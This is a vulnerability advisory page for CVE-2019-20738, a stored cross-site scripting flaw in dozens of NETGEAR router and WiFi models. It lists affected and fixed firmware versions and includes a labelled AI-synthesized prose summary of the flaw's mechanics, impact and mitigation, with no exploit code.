CVE-2019-20738
Description
Certain NETGEAR devices are affected by stored XSS. This affects D6100 before 1.0.0.58, D7800 before 1.0.1.34, JNR1010v2 before 1.1.0.50, JWNR2010v5 before 1.1.0.50, RBK50 before 2.3.5.30, RBR50 before 2.3.5.30, RBS50 before 2.3.5.30, R6020 before 1.0.0.30, R6080 before 1.0.0.30, R6100 before 1.0.1.16, R6120 before 1.0.0.40, R6700v2 before 1.2.0.14, R6800 before 1.2.0.14, R6900v2 before 1.2.0.14, R7500v2 before 1.0.3.26, R7800 before 1.0.2.46, R9000 before 1.0.4.2, WN3000RPv2 before 1.0.0.52, WN3000RPv3 before 1.0.2.78, WNDR3700v4 before 1.0.2.102, WNDR3700v5 before 1.1.0.54, WNDR4300v1 before 1.0.2.104, WNDR4300v2 before 1.0.0.48, WNDR4500v3 before 1.0.0.48, WNR1000v4 before 1.1.0.50, WNR2000v5 before 1.0.0.64, WNR2020 before 1.1.0.50, and WNR2050 before 1.1.0.50. NOTE: this may be a result of an incomplete fix for CVE-2017-18866.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
Stored cross-site scripting vulnerability in multiple NETGEAR devices could allow attackers to execute arbitrary JavaScript in the context of the admin interface.
Vulnerability
A stored cross-site scripting (XSS) vulnerability exists in multiple NETGEAR routers, gateways, and WiFi systems, including D6100, D7800, JNR1010v2, JWNR2010v5, RBK50, RBR50, RBS50, R6020, R6080, R6100, R6120, R6700v2, R6800, R6900v2, R7500v2, R7800, R9000, WN3000RPv2, WN3000RPv3, WNDR3700v4, WNDR3700v5, WNDR4300v1, WNDR4300v2, WNDR4500v3, WNR1000v4, WNR2000v5, WNR2020, and WNR2050 running firmware versions prior to the fixed releases listed in the advisory [1]. The vulnerability may result from an incomplete fix for CVE-2017-18866. Stored XSS allows an attacker to inject malicious script code that is stored on the device and executed when an administrator accesses certain pages.
Exploitation
An attacker with network access to the device's web interface (typically requiring authentication as an administrator) can inject malicious JavaScript into an input field that is later rendered without proper sanitization. The injected script becomes stored on the device and executes when an administrator views the affected page, for example, the device status or configuration page [1]. No user interaction beyond normal admin operations is required.
Impact
Successful exploitation allows the attacker to execute arbitrary JavaScript in the context of the administrator's browser session. This can lead to session hijacking, credential theft, alteration of device settings, or further attacks against the network. The impact is limited to the web interface and does not directly provide code execution on the device itself.
Mitigation
NETGEAR has released fixed firmware versions for all affected models: D6100 1.0.0.58, D7800 1.0.1.34, JNR1010v2 1.1.0.50, JWNR2010v5 1.1.0.50, RBK50 2.3.5.30, RBR50 2.3.5.30, RBS50 2.3.5.30, R6020 1.0.0.30, R6080 1.0.0.30, R6100 1.0.1.16, R6120 1.0.0.40, R6700v2 1.2.0.14, R6800 1.2.0.14, R6900v2 1.2.0.14, R7500v2 1.0.3.26, R7800 1.0.2.46, R9000 1.0.4.2, WN3000RPv2 1.0.0.52, WN3000RPv3 1.0.2.78, WNDR3700v4 1.0.2.102, WNDR3700v5 1.1.0.54, WNDR4300v1 1.0.2.104, WNDR4300v2 1.0.0.48, WNDR4500v3 1.0.0.48, WNR1000v4 1.1.0.50, WNR2000v5 1.0.0.64, WNR2020 1.1.0.50, and WNR2050 1.1.0.50 [1]. Users should update to the latest firmware as soon as possible.
AI Insight generated on May 26, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected products
4- NETGEAR/NETGEAR devicesdescription
Patches
0No patches discovered yet.
Vulnerability mechanics
AI mechanics synthesis has not run for this CVE yet.
References
1News mentions
0No linked articles in our index yet.